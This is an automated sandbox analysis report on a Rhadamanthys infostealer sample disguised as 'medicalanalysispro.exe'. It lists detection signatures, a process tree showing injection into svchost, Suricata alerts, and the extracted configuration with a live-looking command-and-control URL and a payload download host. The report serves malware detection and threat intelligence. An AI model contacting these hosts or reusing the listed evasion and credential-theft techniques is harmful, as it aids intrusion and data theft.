Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
medicalanalysispro.exe

Overview

General Information

Sample name:medicalanalysispro.exe
Analysis ID:1579551
MD5:178a2a89cb76efea6df50cc884991226
SHA1:918b309ab3ff30be807e073df80596eff5800ced
SHA256:357829b06c1c185e44efa729dd8671487a43778a3be1b6f46c7956f4d4cb49e2
Tags:exeuser-aachum
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites Mozilla Firefox settings
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • medicalanalysispro.exe (PID: 1136 cmdline: "C:\Users\user\Desktop\medicalanalysispro.exe" MD5: 178A2A89CB76EFEA6DF50CC884991226)
    • medicalanalysis.exe (PID: 3756 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe MD5: 443B43ADCB78164D40C977ABAC54C18E)
      • InstallUtil.exe (PID: 2208 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • svchost.exe (PID: 5284 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • svchost.exe (PID: 2128 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • chrome.exe (PID: 5560 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr7A3F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/299e36a8/4a1b3c1a" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 5328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=1988,i,17588482768743523703,9612688195532631865,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • wmprph.exe (PID: 6468 cmdline: "C:\Program Files\Windows Media Player\wmprph.exe" MD5: B4298167D12E6AC4618518E0B6326802)
        • WerFault.exe (PID: 5592 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 324 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • medicallanalysis.exe (PID: 6728 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe MD5: 2DBC39DCE4C3B66019E84A28A342EAD0)
      • cmd.exe (PID: 5928 cmdline: "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6324 cmdline: timeout 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • rundll32.exe (PID: 6640 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000003.2228716630.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000007.00000003.2242940792.0000000005500000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000001.00000002.2218187485.0000000002427000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000001.00000002.2229000559.0000000005840000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000007.00000003.2234168515.00000000052E0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.medicalanalysis.exe.5840000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              7.3.svchost.exe.5500000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                7.3.svchost.exe.52e0000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  7.3.svchost.exe.5500000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    7.3.svchost.exe.52e0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                      Sigma Signatures

                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\medicalanalysispro.exe, ProcessId: 1136, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                      Sigma detected: Uncommon Svchost Parent Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 2208, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 5284, ProcessName: svchost.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 2208, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 5284, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-22T23:57:23.800331+010028548242Potentially Bad Traffic104.37.175.2187982192.168.2.449802TCP
                      2024-12-22T23:57:34.987061+010028548242Potentially Bad Traffic104.37.175.2187982192.168.2.449831TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-22T23:56:59.502250+010028548021Domain Observed Used for C2 Detected104.37.175.2187982192.168.2.449738TCP
                      2024-12-22T23:57:23.800331+010028548021Domain Observed Used for C2 Detected104.37.175.2187982192.168.2.449802TCP
                      2024-12-22T23:57:34.987061+010028548021Domain Observed Used for C2 Detected104.37.175.2187982192.168.2.449831TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 1.2.medicalanalysis.exe.35404f8.2.raw.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeReversingLabs: Detection: 60%
                      Multi AV Scanner detection for submitted file
                      Source: medicalanalysispro.exeVirustotal: Detection: 21%Perma Link
                      Source: medicalanalysispro.exeReversingLabs: Detection: 52%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: medicalanalysispro.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE730EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7BDE730EC
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6060F0 CryptUnprotectData,16_3_00007DF4AE6060F0
                      Source: unknownHTTPS traffic detected: 5.2.81.126:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: medicalanalysispro.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: wextract.pdb source: medicalanalysispro.exe
                      Source: Binary string: wextract.pdbGCTL source: medicalanalysispro.exe
                      Source: Binary string: wkernel32.pdb source: svchost.exe, 00000007.00000003.2233297318.0000000005400000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2233110794.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000007.00000003.2242940792.0000000005500000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2234168515.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: medicalanalysis.exe, 00000001.00000002.2227832328.0000000005680000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.0000000003439000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.00000000033E8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: svchost.exe, 00000007.00000003.2230273318.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2229865266.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000007.00000003.2232472800.0000000005480000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2231661121.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000007.00000003.2230273318.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2229865266.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: medicalanalysis.exe, medicalanalysis.exe, 00000001.00000002.2227832328.0000000005680000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.0000000003439000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.00000000033E8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: svchost.exe, 00000007.00000003.2232472800.0000000005480000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2231661121.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: medicalanalysis.exe, 00000001.00000002.2229470684.00000000058E0000.00000004.08000000.00040000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.000000000360A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdb source: wmprph.exe, 00000015.00000003.2651124820.00000242C8ED0000.00000004.00000001.00020000.00000000.sdmp, wmprph.exe, 00000015.00000003.2651176704.00000242C8F00000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000007.00000003.2242940792.0000000005500000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2234168515.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000007.00000003.2233297318.0000000005400000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2233110794.00000000052E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdbGCTL source: wmprph.exe, 00000015.00000003.2651124820.00000242C8ED0000.00000004.00000001.00020000.00000000.sdmp, wmprph.exe, 00000015.00000003.2651176704.00000242C8F00000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE7204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7BDE7204C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE600B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,16_3_00007DF4AE600B80
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h1_2_055D0DE0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 0561DEE8h1_2_0561DE28
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 0561DEE8h1_2_0561DE30
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 05937BD0h1_2_05937B50
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 05937BD0h1_2_05937B17
                      Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp16_3_00007DF4AE611741
                      Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp16_2_0000018B292A0511
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 4x nop then dec esp21_2_00000242C8C05681
                      Source: chrome.exeMemory has grown: Private usage: 1MB later: 23MB

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.218:7982 -> 192.168.2.4:49738
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.218:7982 -> 192.168.2.4:49802
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.218:7982 -> 192.168.2.4:49831
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.37.175.218 7982Jump to behavior
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o
                      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 104.37.175.218:7982
                      Source: global trafficHTTP traffic detected: GET /temp/Nomrwfj.mp4 HTTP/1.1Host: erdogansigorta.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 194.58.203.20 194.58.203.20
                      Source: Joe Sandbox ViewIP Address: 129.6.15.28 129.6.15.28
                      Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                      Source: Joe Sandbox ViewASN Name: MAJESTIC-HOSTING-01US MAJESTIC-HOSTING-01US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 104.37.175.218:7982 -> 192.168.2.4:49802
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 104.37.175.218:7982 -> 192.168.2.4:49831
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.37.175.218
                      Source: global trafficHTTP traffic detected: GET /temp/Nomrwfj.mp4 HTTP/1.1Host: erdogansigorta.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: erdogansigorta.com
                      Source: global trafficDNS traffic detected: DNS query: x.ns.gin.ntt.net
                      Source: global trafficDNS traffic detected: DNS query: gbg1.ntp.se
                      Source: global trafficDNS traffic detected: DNS query: time.google.com
                      Source: global trafficDNS traffic detected: DNS query: time.windows.com
                      Source: global trafficDNS traffic detected: DNS query: time.facebook.com
                      Source: global trafficDNS traffic detected: DNS query: time-a-g.nist.gov
                      Source: chrome.exe, 00000011.00000002.2513237822.0000643402280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2518545007.0000643402BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516198359.0000643402790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2513962060.000064340234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516043203.000064340273C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/
                      Source: chrome.exe, 00000011.00000002.2519293051.0000643402CD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1a
                      Source: chrome.exe, 00000011.00000002.2518545007.0000643402BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1a0(p
                      Source: chrome.exe, 00000011.00000002.2511171021.00003F1400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1a?
                      Source: chrome.exe, 00000011.00000002.2511976366.0000456C00248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1aEl$
                      Source: chrome.exe, 00000011.00000002.2521399462.0000643402F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1ainFrame
                      Source: chrome.exe, 00000011.00000002.2519762113.0000643402D7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1ainFramed4
                      Source: chrome.exe, 00000011.00000002.2521399462.0000643402F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1aination
                      Source: chrome.exe, 00000011.00000002.2519029791.0000643402C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1ap
                      Source: chrome.exe, 00000011.00000002.2521399462.0000643402F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1append
                      Source: chrome.exe, 00000011.00000002.2521399462.0000643402F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/299e36a8/4a1b3c1ayPolicy
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2516237567.00006434027B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                      Source: chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/21626
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                      Source: chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2515463302.0000643402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                      Source: chrome.exe, 00000011.00000003.2498345140.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2483164376.0000643402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2498443032.000064340299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2519950763.0000643402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
